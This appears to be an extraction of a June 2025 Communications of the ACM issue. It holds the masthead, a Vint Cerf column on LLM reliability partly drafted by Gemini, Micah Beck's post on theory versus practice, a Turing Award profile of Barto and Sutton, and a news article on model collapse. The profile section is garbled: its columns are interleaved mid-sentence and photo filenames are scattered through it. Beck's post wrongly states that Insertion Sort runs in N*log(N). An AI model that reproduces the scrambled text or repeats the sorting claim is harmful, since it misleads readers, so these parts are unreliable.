Communications of the ACM
06/2025, Vol. 68, No. 06
cacm.acm.org
Association for Computing Machinery
COMMUNICATIONS OF THE ACM

8 Turing Profile
A Rewarding Line of Work
Andrew G. Barto and Richard S. Sutton and the path that led to the 2024 ACM A.M. Turing Award.
By Neil Savage

74 Technical Perspective
When Proofs Meet Programs: An Extension of Dependent Type Theory with Church’s Thesis
By Christine Paulin-Mohring

Watch the authors discuss this work in the exclusive Communications video: https://cacm.acm.org/videos/datacenter-networks
Communications of the ACM is the leading monthly print and online magazine for the computing and information technology fields.
Communications is recognized as the most trusted and knowledgeable source of industry information for today’s computing professional.
Communications brings its readership in-depth coverage of emerging areas of computer science, new trends in information technology,
and practical applications. Industry leaders use Communications as a platform to present and debate various technology implications,
public policies, engineering challenges, and market trends. The prestige and unmatched reputation that Communications of the ACM
enjoys today is built upon a 50-year commitment to high-quality editorial content and a steadfast dedication to advancing the arts,
sciences, and applications of information technology.
ACM, the world’s largest educational and scientific computing society, delivers resources that advance computing as a science and profession. ACM provides the computing field’s premier Digital Library and serves its members and the computing profession with leading-edge publications, conferences, and career resources.

Executive Director and CEO: Vicki L. Hanson
Deputy Executive Director and COO: Patricia Ryan
Director, ACM Digital Library: Wayne Graves
Director, Office of Financial Services: James Schembari
Director, Office of SIG Services: Donna Cappo
Director, Office of Publications: Scott E. Delman

ACM COUNCIL
President: Yannis Ioannidis
Vice-President: Elisa Bertino
Secretary/Treasurer: Rashmi Mohan
Past President: Gabriele Kotsis
Chair, SGB Board: Jens Palsberg
Co-Chairs, Publications Board: Wendy Hall and Divesh Srivastava
Members-at-Large: Odest (Chad) Jenkins, John Kim, Tanara Lauschner, Alison Derbenwick Miller, Alejandro Saucedo
SGB Council Representatives: Jeanna Neefe Matthews and Vivek Sarkar

BOARD CHAIRS
Education Board: Elizabeth Hawthorne and Alison Derbenwick Miller
Practitioners Board: Terry Coatta
Digital Library Board: Jack Davidson

TOPIC AND REGIONAL COUNCIL CHAIRS
Diversity, Equity, and Inclusion Council: Stephanie Ludi
Technology Policy Council: Jim Hendler
ACM Europe Council: Rosa Badia
ACM India Council: Venkatesh Raman
ACM China Council: Xinbing Wang

PUBLICATIONS BOARD
Co-Chairs: Wendy Hall and Divesh Srivastava
Board Members: Jonathan Aldrich; Rick Anderson; Tom Crick; Jack Davidson; Mike Heroux; Michael Kirkpatrick; James Larus; Marc Najork; Beng Chin Ooi; Mauro Pezzè; Francesca Rossi; Bobby Schnabel; Stuart Taylor; Bhavani Thuraisingham; Adelinde Uhrmacher; Philip Wadler; John West; Min Zhang

STAFF
Director of Publications: Scott E. Delman, [email protected]
Executive Editor, ACM Magazines: Ralph Raiola
Senior Editor: John Stanik
Managing Editor: Thomas E. Lambert
Senior Editor/News: Lawrence M. Fisher
Web Editor: David Roman
Editorial Assistant: Danbi Yu
Art Director: Andrij Borys
Associate Art Director: Margaret Gray
Assistant Art Director: Mia Angelica Balaquiot
Production Manager: Bernadette Shade
Intellectual Property Rights Coordinator: Barbara Ryan
Advertising Sales Account Manager: Ilia Rodriguez

CONTACT POINTS
Copyright permission: [email protected]
Calendar items: [email protected]
Change of address: [email protected]
Letters to the Editor: [email protected]

WEBSITE
https://cacm.acm.org

AUTHOR GUIDELINES
https://cacm.acm.org/author-guidelines/

COMPUTER SCIENCE TEACHERS ASSOCIATION
Executive Director: Jake Baskin

EDITORIAL BOARD
Editor-in-Chief: James Larus, [email protected]
Senior Editors: Andrew A. Chien; Moshe Y. Vardi
Editors, In Memoriam Section: Simson L. Garfinkel; Eugene H. Spafford

NEWS
Chair: Tom Conte
Board Members: Siobhán Clarke; Lance Fortnow; Irwin King; Mei Kobayashi; Rajeev Rastogi; Vinoba Vinayagamoorthy

OPINION
Co-Chairs: Jeanna Neefe Matthews and Chiara Renso
Board Members: Saurabh Bagchi; Mike Best; Judith Bishop; Florence M. Chee; Danish Contractor; Lorrie Cranor; Janice Cuny; Ophir Frieder; James Grimmelmann; Mark Guzdial; Mark D. Hill; Brittany Johnson; Bran Knowles; Tim Menzies; Beng Chin Ooi; Alessandra Raffaetà; Francesca Rossi; R. Benjamin Shapiro; Len Shustek; Bernd Stahl; Stuart Taylor; Loren Terveen; Marshall Van Alstyne; Matt Wang; Robert West; Susan J. Winter
Columnists: Saurabh Bagchi; Michael L. Best; Michael A. Cusumano; Peter J. Denning; Thomas Haigh; Leah Hoffmann; Mari Sako; Pamela Samuelson; Marshall Van Alstyne

PRACTICE
Co-Chairs: Betsy Beyer and Ben Fried
Board Members: Peter Alvaro; Stephen Bourne; Terry Coatta; Nicole Forsgren; Camille Fournier; Chris Grier; Tom Killalea; Tom Limoncelli; Kate Matsudaira; Erik Meijer; George Neville-Neil; Theo Schlossnagle; Kelly Shortridge; Phil Vachon; Jim Waldo

RESEARCH AND ADVANCES
Co-Chairs: m.c. schraefel and Premkumar T. Devanbu
Board Members: Indrajit Bhattacharya; Alan Bundy; Peter Buneman; Haibo Chen; Monojit Choudhury; Jane Cleland-Huang; Gerardo Con Diaz; Anna Cox; Kathi Fisler; Nate Foster; Chris Hankin; Rebecca Isaacs; Trent Jaeger; Gal A. Kaminka; Fabio Kon; Ben C. Lee; David Lo; Renée Miller; Ankur Moitra; Sue Moon; Sarah Morris; Abhik Roychoudhury; Katie A. Siek; Daniel Susser; Charles Sutton; Tao Xie; Thomas Zimmermann

RESEARCH HIGHLIGHTS
Co-Chairs: Shriram Krishnamurthi and Caroline Appert
Board Members: Martin Abadi; Sanjeev Arora; Maria-Florina Balcan; David Brooks; Stuart K. Card; Jon Crowcroft; Lieven Eeckhout; Gernot Heiser; Takeo Igarashi; Nicole Immorlica; Srinivasan Keshav; Sven Koenig; Karen Liu; Claire Mathieu; Joanna McGrenere; Tamer Özsu; Tim Roughgarden; Guy Steele, Jr.; Wang-Chiew Tan; Robert Williamson; Andreas Zeller

WEB BOARD
Chair: James Landay
Board Members: Marti Hearst; Jason I. Hong; Wendy E. MacKay

REGIONAL SPECIAL SECTIONS
Co-Chairs: Virgilio Almeida, Haibo Chen, Jakob Rehof, and P J Narayanan
Board Members: Sherif G. Aly; Panagiota Fatourou; Kenjiro Taura

ASSOCIATION FOR COMPUTING MACHINERY (ACM)
1601 Broadway, 10th Floor, New York, NY 10019-7434 USA
T (212) 869-7440; F (212) 869-0481

ACM Copyright Notice
Copyright © 2025 by Association for Computing Machinery, Inc. (ACM). Permission to make digital or hard copies of part or all of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and full citation on the first page. Copyright for components of this work owned by others than ACM must be honored. Abstracting with credit is permitted. To copy otherwise, to republish, to post on servers, or to redistribute to lists, requires prior specific permission and/or fee. Request permission to publish from [email protected] or fax (212) 869-0481.

For other copying of articles that carry a code at the bottom of the first or last page or screen display, copying is permitted provided that the per-copy fee indicated in the code is paid through the Copyright Clearance Center; www.copyright.com.

Subscriptions
An annual subscription cost is included in ACM member dues of $99 ($40 of which is allocated to a subscription to Communications); for students, cost is included in $42 dues ($20 of which is allocated to a Communications subscription). A nonmember annual subscription is $269.

Single Copies
Single copies of Communications of the ACM are available for purchase. Please contact [email protected].

ACM ADVERTISING DEPARTMENT
1601 Broadway, 10th Floor, New York, NY 10019-7434 USA
T (212) 626-0686; F (212) 869-0481
Advertising Sales Account Manager: Ilia Rodriguez, [email protected]
Media Kit: [email protected]

COMMUNICATIONS OF THE ACM (ISSN 0001-0782) is published monthly by ACM Media, 1601 Broadway, 10th Floor, New York, NY 10019-7434 USA. Periodicals postage paid at New York, NY 10001, and other mailing offices.

POSTMASTER
Please send address changes to Communications of the ACM, 1601 Broadway, 10th Floor, New York, NY 10019-7434 USA.

Printed in the USA.

Please recycle this magazine.
BY THE TIME you are reading this, our annual ACM Awards gala will be upon us, and I want to take a moment to acknowledge and congratulate all the awardees. They represent our most creative and productive colleagues, who have earned recognition and admiration for their work. The Turing Award recipients for 2024, which will be presented this month, are Andrew Barto and Richard Sutton, for their seminal introduction of reinforcement learning. As most readers will know, this is one of the major methods by which large neural networks are trained. It is fitting that the rest of this essay is being written with the deliberate assistance of the Google Gemini large language model (LLM). In the past, I have commented on the proclivity of LLMs to hallucinate, but recent experiences have convinced me that these tools are increasingly useful and reliable (and, no, that praise was NOT introduced by the Gemini system).

Begin bot-assisted section:

Large language models (LLMs) are rapidly evolving from fascinating research projects into indispensable tools for myriad text-based tasks, including generation, note-taking, and complex writing assignments. This ascent is marked by significant strides in two key areas: a notable improvement in their factual accuracy and a marked reduction in the propensity for “hallucination”—the generation of plausible but false or nonsensical information. Simultaneously, the very definition of an LLM’s output is expanding, moving beyond text to embrace a rich tapestry of sound, imagery, and even video. These advancements are solidifying LLMs’ position as increasingly reliable and versatile partners in creative and analytical endeavors.

One hurdle limiting the widespread adoption of LLMs has been concern over the veracity of their outputs. Early iterations, while often fluent and coherent, could sometimes confidently present inaccuracies. However, recent developments are systematically addressing this challenge. Techniques such as retrieval-augmented generation (RAG) are at the forefront of this progress. RAG systems connect LLMs to external, verifiable knowledge bases, allowing them to ground their responses in current, curated information rather than relying solely on their training data. This dramatically reduces the production of factual errors and hallucinations. Some research indicates improvements of 42%–68% and even higher in specific domains, such as medical AI, when paired with trusted sources.

Further enhancing reliability are innovative prompting strategies such as chain-of-thought (CoT) prompting. By encouraging LLMs to “think step-by-step” and to articulate their reasoning process before arriving at an answer, CoT prompting significantly improves logical consistency and accuracy, particularly in complex reasoning tasks. Some studies have demonstrated accuracy improvements of up to 35%. Additionally, methods such as self-consistency decoding, where an LLM generates multiple reasoning paths and selects the most coherent one, and the integration of knowledge graphs to provide structured factual context, are proving effective in bolstering the trustworthiness of LLM-generated content. The emergence of agentic AI systems, which can perform multi-step reasoning, cross-reference information from various sources, and even self-critique their outputs, represents another advance in ensuring factual grounding.

Beyond textual fidelity, the creative and practical scope of LLMs is undergoing a dramatic expansion through multimodality. No longer confined to processing and generating text, newer models can understand and generate content across different formats, including images, audio, and, increasingly, video. Users can now provide an image and receive a textual description, ask questions about its content, or even request variations. Text-to-image generation has become widely accessible, and the capabilities are extending to audio generation (text-to-speech, music generation) and video analysis and creation. Nvidia’s “Describe Anything 3B” model, for example, excels at fine-grained image and video captioning. This multimodal capability unlocks a new realm of applications, from more intuitive and accessible note-taking that can incorporate visual or auditory information to richer, more engaging content creation that seamlessly blends different media.

In conclusion, the trajectory of LLMs is one of rapid advancement in both reliability and scope. The concerted efforts to reduce hallucinations and enhance factual accuracy, coupled with the exciting expansion into multimodal outputs, are transforming these models into increasingly powerful and trustworthy tools for a wide array of communication and creative tasks. However, this evolution also brings to the fore important ethical, practical, and societal considerations that must be addressed to harness the full potential of LLMs responsibly.

Vinton G. Cerf is vice president and Chief Internet Evangelist at Google. He served as ACM president from 2012–2014.

© 2025 Copyright held by the owner/author(s).
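The RAG pipeline sketched in this column (retrieve trusted documents first, then ask the model to answer only from them) reduces to a few lines. The sketch below is purely illustrative: the toy corpus, the word-overlap retriever, and the prompt template are assumptions for demonstration, not any vendor's API. A production system would use a vector index and an actual model call on the assembled prompt.

```python
# Minimal retrieval-augmented generation sketch (illustrative only).
def retrieve(query, corpus, k=2):
    """Rank documents by naive word overlap with the query; return the top k."""
    def score(doc):
        return len(set(query.lower().split()) & set(doc.lower().split()))
    return sorted(corpus, key=score, reverse=True)[:k]

def rag_prompt(query, corpus):
    """Assemble a prompt that grounds the model's answer in retrieved context."""
    context = "\n".join(retrieve(query, corpus))
    return f"Answer using only this context:\n{context}\n\nQuestion: {query}"

# Toy "knowledge base" standing in for an external, curated source.
corpus = [
    "The 2024 ACM A.M. Turing Award went to Andrew Barto and Richard Sutton.",
    "Quicksort has quadratic worst-case running time.",
    "TCP uses a 16-bit checksum.",
]
print(rag_prompt("Who won the 2024 Turing Award?", corpus))
```

In a real deployment the assembled prompt would be sent to a model; the grounding comes from instructing the model to answer only from the retrieved context rather than from its training data.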
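Self-consistency decoding, mentioned above, is equally simple to state precisely: sample several independent reasoning paths and keep the majority answer. A minimal sketch follows, with a deterministic stub standing in for the sampled model calls (an assumption for illustration; a real system would draw from an LLM at nonzero temperature):

```python
from collections import Counter
from itertools import cycle

def self_consistency(sample_answer, prompt, n=5):
    """Sample n independent answers and return the most common one."""
    answers = [sample_answer(prompt) for _ in range(n)]
    return Counter(answers).most_common(1)[0][0]

# Deterministic stand-in for a stochastic LLM call (illustrative only).
fake_samples = cycle(["42", "42", "41", "42", "38"])
def fake_model(prompt):
    return next(fake_samples)

print(self_consistency(fake_model, "What is 6 x 7?", n=5))  # majority answer: "42"
```

The majority vote discards the occasional wrong reasoning path, which is why the technique improves accuracy on multi-step problems.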
https://cacm.acm.org/blog
Accept the Consequences
Computer science is based on the cynical acceptance of a mismatch between theory and practice, according to Micah D. Beck.
MICAH D. BECK
We’re Reaping Just What We Sowed
DOI: 10.1145/3723348
https://bit.ly/4bwAz2u
January 8, 2025

Theoretical computer science is a glass slipper that has never quite fit the foot of practical computer engineering. The essence of their marriage is that theoreticians devise a formal model which captures some essential features of reality and then apply reasoning about it to implementations. The problems occur when the models do not capture enough of the structure of real systems to explain and predict their behavior.

Some of the earliest issues in modeling computation arise in dealing with finiteness. The problem with finite computational models is that they are all equivalent in expressive power and also quite limited. This creates two issues: the inability to solve irregular problems on inputs of unbounded size (see Pumping Lemma, https://bit.ly/4btOm9Y), and the possibility of highly specific effects that arise due to the precise numerical bound on size (as is found in finite group theory, https://bit.ly/3DtWBpS).

The idea of computing using an abstract machine model (for example, push-down automata (https://bit.ly/3XtG7EY) and Turing machines (https://bit.ly/41Ko8gk)) that can grow during the execution of an algorithm leads to a theory of computation that is quite rich. The implications of such models can apply to real-world computers, as long as resource utilization does not exceed their physical limitations. Even when those bounds are reached, there is still the question of what could in future be computed on machines of ever-greater size and speed (https://bit.ly/3FiNjgW). However, when even futuristic physical limitations and issues such as power consumption are addressed, the correspondence between the infinitary models and reality starts to fray.

A widely understood example of this divergence can be found in the application of the theory of algorithmic complexity to sorting. The classical analysis of sorting yields the well-known result (https://bit.ly/3D7gIKE) that, in the worst case, the number of comparison or data movement operations required to sort a list of N integers is bounded by some constant multiple of N*log(N). However, the most commonly used algorithm, Quicksort (https://bit.ly/4hhI2DM), requires quadratic resources in the worst case (meaning some multiple of N²). A multiple of N² is greater than any multiple of N*log(N) for large-enough N, so in the unbounded theory of complexity, Quicksort is considered “less efficient” than any number of algorithms, such as Insertion Sort (https://bit.ly/43tKLXt), that can be implemented using at most a multiple of N*log(N) resources.

There are many reasons for this mismatch between theory and practice, including:
1. The pattern of memory and register usage in Quicksort means that it is extremely efficient on moderately sized datasets (locality, https://bit.ly/4i8OBK5).

2. In many realistic applications, it is unlikely that the worst case scenario of maximum resource utilization for Quicksort will occur, and in some cases, Quicksort is able to terminate very quickly (a characteristic known as “early stopping”).

3. In practice, many sorting utilities evaluate the nature of their input and adaptively use a number of different algorithms as alternatives or in concert to try and obtain the best result. This includes the use of Bubble Sort (https://bit.ly/3DoSOu3), an algorithm which has terrible worst-case efficiency but is well adapted to very small datasets.

4. When datasets must be moved from secondary storage or across a communication network to be sorted, the resources required for data movement (which is linear, or a multiple of N) in practice may overshadow those taken for sorting.

In spite of the complexity of this reality, the abstract theory of sorting is still taught because of its simplicity and power. It is still common to teach students that algorithms with high resource utilization on unbounded inputs should be avoided or may be impossible to use in practice (https://bit.ly/41HMgjB). We then rely on their unlearning these early lessons either in practical data management classes or on the job. The truth is considered too complex and does not lend itself to abstract proofs, a skill we are eager to teach.

I came across a more current example of such a mismatch when teaching an undergraduate computer networking course. One of the fundamental lessons of network architecture is that packet networks are not reliable: packets sent may be lost, may be corrupted in transit, may be delayed without bound, and may be misdelivered. There is also a theorem of distributed systems (https://bit.ly/3QJu3vM) that tells us it is impossible to use an unreliable network to implement one that is completely reliable. But computer networking textbooks universally describe the Internet’s Transport Control Protocol (TCP, https://bit.ly/4bM73Gh) as “reliable.”

The truth is complex. TCP implements a different error model than the Internet Protocol (https://bit.ly/4iwczPn), using a number of tools including checksums, sequence numbering, and retransmission to reduce the probability of data corruption or misdelivery. TCP also introduces new error modes (such as a “broken connection”) that do not exist in the Internet’s underlying packet delivery model. Together, these are thought to reduce the probability of error to the point that most common applications are sufficiently stable, and this is considered a usable definition of “reliable.”

Application developers regularly use TCP as if it were completely reliable (https://bit.ly/43methb), although its 16-bit checksum makes “silent data corruption” highly probable in sufficiently large data transfers. Developers working in application areas such as scientific computing, where such errors are considered unacceptable, understand the issue and use longer end-to-end file hashes (https://bit.ly/4iqh262) and retransmission to overcome errors. However, in fields such as multimedia streaming (https://bit.ly/4i4UTdS), where occasional errors are thought to be acceptable, it is common to simply consider TCP to be “reliable enough.” The same problems haunt storage and computation at large scale and are only addressed when the mismatch causes unacceptable application failures. It is worth noting that, because of the highly “discontinuous” nature of programmable systems, unanticipated errors can be the cause of massive security failures or seemingly unrelated aberrant system behavior.

Today we are faced with generative AI, a new subfield of computer engineering that offers us the use of trained behaviors known to be error-prone (https://bit.ly/4icxM16). Generative AI may be considered “reliable enough” for some applications, at least initially. The relationship between generative AI and the real world is unknown, because of the use of statistical and randomized methods. The application of more reliable guardrails (https://bit.ly/3Fa7AWb) requires the use of classical AI tools based on formal logic. These are not keeping up with the prolific ability of generative AI to copy and guess.

The defense of generative AI that it is “good enough” to be used in a world already filled with human and machine error echoes the universal response of my networking students that my objection to calling TCP “reliable” is pedantic and old-fashioned. They say the word “reliable” has simply been given a new meaning. Or that “everyone knows” that the “reliable” mechanism must be checked (although this fact is not taught and is not widely understood). Mainly, they want to keep the subject matter simple and understandable so they can learn to program using an intuitive API, get a grade, and a job. And the writers of textbooks and the developers of modern university curricula seem to agree with them.

So please, everyone who reacts in horror to the acceptance of “hallucinations” and other errors in generative AI, stop clutching your pearls. We have developed a field (computer science) based on the cynical acceptance of a mismatch between theory and practice. We have done this in order to validate our own education and the history of the field to date.

It is important that we teach practical computer engineering as a field separate from formal computer science. The latter can help in the understanding and analysis of the former, but may never model it well enough to be predictive in the way the physical sciences are.

Micah D. Beck ([email protected]) is an associate professor at the Department of Electrical Engineering and Computer Science, University of Tennessee, Knoxville, TN, USA.

© 2025 Copyright held by the owner/author(s).
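Beck's Quicksort point earlier in the piece can be checked by direct counting: a naive first-element-pivot Quicksort performs roughly N²/2 comparisons on already-sorted input, while on shuffled input it stays near N·log(N). The sketch below is illustrative only; the pivot rule and input sizes are arbitrary choices, not drawn from the post.

```python
import random

def quicksort_comparisons(items):
    """Naive Quicksort with first-element pivot; returns the comparison count."""
    count = 0
    def qs(lst):
        nonlocal count
        if len(lst) <= 1:
            return lst
        pivot, rest = lst[0], lst[1:]
        count += len(rest)                     # one comparison per element vs. pivot
        lo = [x for x in rest if x < pivot]
        hi = [x for x in rest if x >= pivot]
        return qs(lo) + [pivot] + qs(hi)
    qs(items)
    return count

n = 300
print(quicksort_comparisons(list(range(n))))   # sorted input: n*(n-1)/2 = 44850
shuffled = list(range(n))
random.Random(0).shuffle(shuffled)
print(quicksort_comparisons(shuffled))         # shuffled: a few thousand, near n*log2(n)
```

The quadratic behavior on sorted input is exactly the worst case the unbounded theory penalizes, and the shuffled-input count is why Quicksort dominates in practice.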
★★
SUTTON
★
Profile | DOI:10.1145/3727966 Neil Savage BAR
A
at
S A N U N D E R G R A D UAT E eventually wound up developing the network achieves a goal—winning at
Stanford University in the modern field of reinforcement learn- chess, say—it receives a reward in the
mid-1970s, Richard Sut- ing (RL), a key method in artificial form of a numerical value. If it loses,
ton pored through the intelligence (AI) that trains neural it gets a negative value. The machine
school’s library, trying to networks by offering them rewards, learns through trial and error, making
read everything he could about learn- much like the chemical boost neurons different moves, with each being rein-
ing and machine intelligence. What he get from doing something positive. forced or penalized.
found disappointed him, because he Thanks to that work, Barto and Sut- RL differs from supervised learning,
did not think it really got to the heart ton are the recipients of the 2024 ACM in which data is labeled and used as ex-
of the matter. “It was mostly pattern A.M. Turing Award. amples. RL also differs from unsuper-
recognition. It was mostly learning RL is the method that helped vised learning, in which the computer
from examples. And I knew from psy- Google’s deep neural network AlphaGo tries to extract useful features to find
PHOTOGRA PHS O F A NDREW G. BA RTO BY JASO N M. G ROW; PH OTOGRA PH S O F RICH ARD S. SU TTON BY RIC HARD MORGE N ST E I N
chology that animals do very different beat a human at the game Go in 2016, structures in data. While both meth-
things,” Sutton said. “They do things and is an important component of fine- ods have proved useful in computing,
to get rewards.” tuning the large language models that neither is how living brains learn.
The one person he found whose are revolutionizing generative AI. It RL had been around for a long time
writing focused on rewards as part of works on the notion that when a neural before he and Sutton started work-
learning was A. Harry Klopf, a scientist ing on it, Barto pointed out. It was the
studying machine intelligence at the subject of AI pioneer Marvin Minsky’s
U.S. Air Force Research Laboratory, RL differs from both thesis in 1954, and★the★★method that
4.jpg
ON_00003Samuel
who believed neurons were hedonists, IBM computer scientist
SUTTArthur
seeking rewards. A letter to Klopf led to supervised learning used to train a computer to play check-
a lunch meeting and, after Sutton grad- and unsupervised ers. By the 1970s, though, the idea had
uated in 1978 with a B.A. in psychology, fallen out of fashion, with most AI re-
to a slot in a research project at the Uni- learning. While both searchers focused on expert systems
versity of Massachusetts (UMass) Am- methods have proved instead. “We had the luxury of being
herst, designed to test Klopf’s ideas. able to be unfashionable,” Barto said,
Sutton joined Andrew Barto, a useful in computing, “so it’s astounding that it’s now very
postdoctoral fellow who had arrived a neither is how living fashionable.”
year earlier to be part of the research A key development the pair came
team. With five years of funding from brains learn. up with was temporal difference learn-
the Air Force and later the National ing. If a computer is trying to learn to
Science Foundation, and no real de- play chess, for example, and the reward
liverables beyond a report, Barto and comes from winning ★ ★★
the game,03that4.jpg
SUTTON_000
Sutton followed their interests and is not very useful for figuring out indi-
★★★ g
BARTO_0129.jp
★★★★ 799.jpg
SUTTON_3
★★★ g
BARTO_0117.jp
★★★★ 621.jpg
SUTTON_3
RTO_0001.jpg
★★★
SUTTON_03
★★★★ 55.jpg
BARTO_01
★★★★★
4049.jpg
SUTTON_0
★★ g
BARTO_0217.jp
★ 6.jpg
SUTTON_366
★★★
BARTO
★★★ 9.jpg
SUTTON_359
★★ g
BARTO_0197.jp
★★★ 4.jpg
SUTTON_362
★★★★ 10.jpg
BARTO_00
★★
SUT
★★ g
BARTO_0108.jp
★★ 6.jpg
SUTTON_361
★★★★★
52.jpg
BARTO_01
★★★ 1.jpg
SUTTON_401
news
vidual moves. Instead, the computer society of neural networks and their in-
tries to predict at each step what the ul- dividual reward systems interact. That
timate reward signal will be, and uses Barto’s advice to could lead to cooperative arrangements,
those predictions as rewards. If the young computer in which the networks reward each
probability of winning goes up after a other to encourage progress toward a
move, that counts as an intermediate scientists is to do common goal, but it could also lead to
reward. The change in predictions over what he and Sutton systems where different networks with
time—the temporal difference—pro- different goals have conflicts of interest.
vides the reinforcement. The next time did: follow their own Such interactions could have implica-
the computer plays chess, it can try interests regardless tions in complicated fields such as eco-
moves that look similar to the ones that nomics and game theory, Barto said.
increased its prediction of winning. of what the rest of the Sutton said the development of AI
Temporal difference learning turned field thinks of them. has much farther to go, including to-
out to have implications outside of AI. ward artificial general intelligence, in
Neuroscientists studying the dopamine which a machine can understand any-
system in the living brain noticed that it behaved similarly to what Barto and Sutton had described. Dopamine, they discovered, acts as an intermediate reward for a predicted outcome, and not the outcome itself, with the cells that produce it sending signals to other parts of the brain to reinforce beneficial actions. “The direct analogs between these reinforcement learning algorithms and the biological dopamine system is, I think, the biggest interaction between engineering and biology in, I would say, forever,” Sutton said.

The two men developed a wide range of RL algorithms, including policy gradient methods that seek to find the best rules for moving toward a goal, and Monte Carlo methods used to estimate possible outcomes.

Barto earned his B.S. in mathematics in 1970 and his Ph.D. in computer science in 1975, both from the University of Michigan. He eventually became co-director of the Adaptive Networks Laboratory (now the Autonomous Learning Laboratory) at UMass, which since his retirement in 2012 has been run by his former students.

Sutton was Barto’s first Ph.D. student, earning his degree in 1984. He went from UMass to GTE’s Fundamental Research Lab, where he spent nine years focused on machine learning. After a period as a self-described “unpaid, part-time ‘senior research scientist’” at UMass, during which he and Barto wrote the first edition of their textbook, he joined the AI department at AT&T Shannon Laboratory. In 2003, he became a professor at the University of Alberta, where he founded the school’s Reinforcement Learning and Artificial Intelligence Laboratory. He is chief scientific advisor at the Alberta Machine Intelligence Institute, one of three Canadian national AI institutes, which he said has been instrumental to his award-winning work. He is also a research scientist at AI startup Keen Technologies.

Barto and Sutton co-authored Reinforcement Learning: An Introduction, the principal textbook in the field, in 1998, with an expanded second edition released in 2018. The men acknowledge other researchers have also played important roles in the field. “It’s not just us,” Barto said. “A lot of people have contributed to aspects of this over the years. I’ve had a number of very wonderful, bright students who built pieces of this whole story.”

A Society of Learners

Barto expects the field eventually will move toward multi-agent RL. Sutton said the development of AI has much farther to go, including toward artificial general intelligence, in which a machine can understand anything that a human can. RL will play an important role in such developments, he said.

Barto’s advice to young computer scientists is to do what he and Sutton did: follow their own interests regardless of what the rest of the field thinks of them. “It’s difficult, but I think you have to have your own motivation to pursue things and stick with it if you can,” he said. As for Sutton, “My recommendation is to write, to challenge your thoughts by writing them down.”

Neither has made any firm decisions on what to do with the $1 million prize they will share as part of the Turing Award. Sutton said he will probably donate his share to the Openmind Research Institute he co-founded, which aims to give young scientists the luxury he and Barto had to explore basic questions that interest them, without any additional responsibilities. Barto said he hopes to use his portion to fund fellowships for graduate students at UMass.

Sutton is optimistic about the future of computer science. “AI will be figured out over the next few decades,” he said. “It will be maybe the greatest intellectual advance ever. So it’s an honor to have contributed a small part to that.”

Neil Savage is a science and technology writer based in Lowell, MA, USA.

© 2025 ACM 0001-0782/25/6

Watch Barto and Sutton discuss their work in the exclusive Communications video. https://cacm.acm.org/videos/turing-award-sutton-barto
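The dopamine finding described above maps onto the temporal-difference (TD) error at the heart of many of these algorithms: the gap between a predicted and a received reward. Below is a minimal, illustrative sketch of tabular TD learning on a five-state chain; the function name and parameters are invented for this example and are not code from Barto and Sutton's textbook.

```python
# Toy temporal-difference (TD) value learning on a 5-state chain.
# The TD error (reward + discounted next value - current value) is the
# quantity whose biological analog is the dopamine signal described above.

def td_chain(episodes=2000, alpha=0.1, gamma=0.9, seed=0):
    import random
    rng = random.Random(seed)
    n = 5                  # states 0..4; reaching state 4 yields reward 1 and ends
    V = [0.0] * n          # estimated value of each state
    for _ in range(episodes):
        s = 0
        while s < n - 1:
            s_next = s + 1 if rng.random() < 0.9 else s   # drift toward the goal
            r = 1.0 if s_next == n - 1 else 0.0
            # bootstrap from the next state's value, except at the terminal state
            target = r + (gamma * V[s_next] if s_next < n - 1 else 0.0)
            V[s] += alpha * (target - V[s])               # TD update on the error
            s = s_next
    return V

values = td_chain()
```

After training, the estimated values rise toward the rewarding end of the chain; the `target - V[s]` term is the reward-prediction error that dopamine is thought to signal.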
EVER SINCE CHATGPT was released to the public in November 2022, people have been using it to generate text, from emails to blog posts to bad poetry, much of which they post online.
Since that release, the companies that
build the large language models (LLMs)
on which such chatbots are based—
such as OpenAI’s GPT 3.5, the technolo-
gy underlying ChatGPT—have also con-
tinued to put out newer versions of their
models, training them with new text
data, some of which they scraped off the
Web. That means, inevitably, that some
of the training data used to create LLMs
did not come from humans, but from
the LLMs themselves.
That has led computer scientists to
worry about a phenomenon they call
model collapse. Basically, model col-
lapse happens when the training data
no longer matches real-world data, lead-
ing the new LLM to produce gibberish,
in a 21st-century version of the classic computer aphorism, “garbage in, garbage out.”

LLMs work by learning the statistical distribution of so-called tokens—words or parts of words—within a language by examining billions of sentences garnered from sources including book databases, Wikipedia, and the Common Crawl dataset—a collection of material gathered from the Internet. An LLM, for instance, will figure out how frequently the word “president” is associated with the word “Obama” versus “Trump” versus “Hair Club for Men.” Then, when prompted by a request, it will produce words it reasons have the highest probability of meeting that request and of following from previous words. The results bear a credible resemblance to human-written text.

Model collapse is basically a statistical problem, said Sanmi Koyejo, an assistant professor of computer science at Stanford University. When machine-generated text replaces human-generated text, the distribution of tokens no longer matches the natural distribution produced by humans. As a result, the training data for a new round of modeling does not match the real world, and the new model’s output gets worse. “The thing we’re worried about is that the distribution of your data that you end up with, if you’re trying to fit your model, ends up really far from the actual distribution that generated the data,” he said.

The problem arises because whatever text the LLM generates would be, at most, a subsample of the sentences on which it was trained. “Because you generate a finite sample, you have some probability of not sampling them,” said Yarin Gal, an associate professor of machine learning at Oxford University. “Once you don’t sample, then they disappear. They will never appear again. So every time you generate data, you basically start forgetting more and more of the tail events and therefore that leads to the concentration of the higher probability events.” Gal and his colleagues published a study in Nature that showed indiscriminate use of what they called ‘recursively generated data’ caused the models to fail.

The problem is not limited to LLMs. Any generative model that is iteratively trained can suffer the same fate if it starts ingesting machine-produced data, Gal says. That includes stable diffusion models that create images, such as Dall-E. The issue also can affect variational autoencoders, which create new data samples by producing variations of their original data. It can apply to Gaussian mixture models, a form of unsupervised machine learning that sorts subpopulations of data into clusters; they are used to analyze customer preferences, predict stock prices, and analyze gene expression.

Collapse is not a danger for models that incorporate synthetic data but only do so once, such as neural networks used to identify cancer in medical images, where synthetic data was used to augment rare or expensive real data. “The main distinction is that model collapse happens when you have multiple steps, where each step depends on the output from the previous step,” Gal said.

The theory that replacing training data with synthetic data will quickly lead to the demise of LLMs is sound, Koyejo said. In practice, however, not all human data gets replaced immediately. Instead, when the generated text is scraped from the Internet, it gets mixed in with human text. “You create synthetic data, you add that to real data, so you now have more data, which is real data plus synthetic data,” he said. What is actually happening, he said, is not data replacement, but data accumulation. That slows the degradation of the dataset.

Simply accumulating data may stop model collapse but can cause other problems if done without thought, said Yunzhen Feng, a Ph.D. student at the Center for Data Science at New York University. As a rule, the performance of neural networks improves as their size increases. Naively mixing real and synthetic data together, however, can slow that improvement. “You can still obtain similar performance, but you need much more data. That means you’re using much more compute and much more money to achieve that,” he said.

